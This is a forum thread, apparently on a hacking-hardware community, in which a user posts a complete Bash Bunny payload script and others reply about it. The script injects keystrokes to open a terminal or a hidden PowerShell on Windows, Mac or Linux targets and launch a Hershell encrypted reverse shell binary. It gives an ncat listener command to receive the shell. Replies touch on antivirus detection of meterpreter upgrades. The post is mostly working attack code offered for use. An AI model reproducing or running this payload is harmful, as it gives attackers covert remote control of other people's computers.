Jump to content

[PAYLOAD] Hershell Mac | Windows | Linux Reverse Shell


Recommended Posts

Posted (edited)

Please PM me if there any issues/improvements. Thanks!

#!/bin/bash
# Title:         Hershell Encrypted Reverse Shell (Cross-platform - Manual Mode)
# Author:        metalkey
# Version:       0.5
# Target:        Windows, Mac OSX, Linux
# Creds:         Ronan Kervella (Creator of Hershell) - https://github.com/sysdream/hershell

# Instructions:
# Hershell Github: https://github.com/sysdream/hershell (read all instructions on Hershell git before starting)
# 1. Compile all payloads and place binaries in the payloads\$SWITCH_POSITION directory (Double check binary names. Defaults are mac32, linux32, win32.exe)
# 2. Uncomment desired target OS payload lines and ensure others are commented out
# 3. Start ncat listener on your attacking machine, that is to receive the reverse shell (e.g. ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 4343)
# 4. Execute attack via Bash Bunny

# SETUP
DRIVER_LABEL='WINDOWS' # Drive label for your Bash Bunny
LED R
GET SWITCH_POSITION # Gets switch position (e.g. switch2)
ATTACKMODE STORAGE HID SERIAL # Keyboard HID Attack + Storage + Serial

# Modified RUN helper
function RUN() {
   local os=$1
   shift
   [[ -z "$os" || -z "$*" ]] && exit 1
   case "$os" in
      WIN)
         QUACK GUI m
         QUACK DELAY 500
         QUACK GUI r
         QUACK DELAY 500
         QUACK STRING cmd.exe
         QUACK DELAY 100
         QUACK ENTER
         QUACK DELAY 500
         QUACK STRING "$@"
         QUACK DELAY 100
         QUACK ENTER
         ;;
      OSX)
         QUACK GUI SPACE
         QUACK DELAY 100
         QUACK STRING terminal
         QUACK DELAY 100
         QUACK ENTER
         QUACK GUI t
         QUACK DELAY 100
         QUACK STRING /bin/bash
         QUACK DELAY 100
         QUACK ENTER
         QUACK STRING "$@"
         QUACK DELAY 100
         QUACK ENTER
         QUACK DELAY 100
         QUACK STRING "exit"
         QUACK DELAY 100
         QUACK ENTER
         QUACK DELAY 100
         QUACK STRING "exit"
         QUACK DELAY 100
         QUACK ENTER
         ;;
      UNITY)
         QUACK ALT F2
         QUACK DELAY 1000
         QUACK STRING xterm
         QUACK DELAY 1000
         QUACK ENTER
         QUACK DELAY 1000
         QUACK STRING /bin/bash
         QUACK DELAY 1000
         QUACK ENTER
         QUACK DELAY 500
         QUACK STRING cd /media/'$USER'
         QUACK DELAY 500
         QUACK ENTER
         QUACK DELAY 500
         QUACK STRING "$@"
         QUACK DELAY 500
         QUACK ENTER
         QUACK DELAY 500
         QUACK STRING "exit"
         QUACK DELAY 500
         QUACK ENTER
         QUACK DELAY 500
         QUACK STRING "exit"
         QUACK DELAY 500
         QUACK ENTER
         ;;
      *)
         exit 1
         ;;
   esac
}
export -f RUN

# START Attack
LED Y

# [+] Mac - Uncomment the following lines to use:
# until ls -halt /dev | head -n 5 | grep -q "nandf"; do sleep 1; done # Wait for bb to mount
# LED Y FAST
# RUN OSX "cp /Volumes/$DRIVER_LABEL/payloads/$SWITCH_POSITION/mac32 /tmp && chmod +x /tmp/mac32 && /tmp/mac32 &"

# [+] Linux - Uncomment the following lines to use:
until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
LED Y FAST
RUN UNITY "cd $DRIVER_LABEL/payloads/$SWITCH_POSITION && cp linux32 /tmp/ && chmod +x /tmp/linux32 && /tmp/linux32 &"

# [+] Windows - Uncomment the following lines to use:
# until dmesg | grep -q "sunxi_usb"; do sleep 1; done; sleep 5 # Wait for bb to mount
# LED Y FAST
# RUN WIN powershell -NoP -NonI -W Hidden -exec bypass ".((gwmi win32_volume -f 'label=''$DRIVER_LABEL''').Name+'\payloads\\$SWITCH_POSITION\win32.exe')"

# END
sleep 5
LED G
# shutdown 0 # LIGHTS OUT = Shutdown and dismount (if desired)

 

Edited by metalkey
Author update
  • Like 1
  • Upvote 1
  • Sebkinne pinned this topic
  • 3 weeks later...
  • 3 weeks later...
Posted

Hey @JediMasterX. Feel free to give it a bash and let me know how you go on this forum or via pm.
I'm aiming to have version 1.0 automatically detect the target OS and perform seamless exploitation but for now the OS selection is manual.

  • Like 1
  • 4 months later...
Posted

Thanks for the payload. I will check this out but I think the AV or even Windows Defender will detect the meterpreter payload when you try to execute the shell code. As in, it will probably let you run the Hershell binary but when you try to upgrade to a meterpreter session, it will get picked up... or am I missing something?

Anyway, before I say anymore I will try to give it a go on the weekend.

Posted
On 10/5/2018 at 2:24 AM, icarus255 said:

OK, please forgive my ignorant comments above :))))))

Not a problem! Also, just to confirm. Hershell was written by Ronan Kervella and his Github contains several other interesting projects: https://github.com/sysdream

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...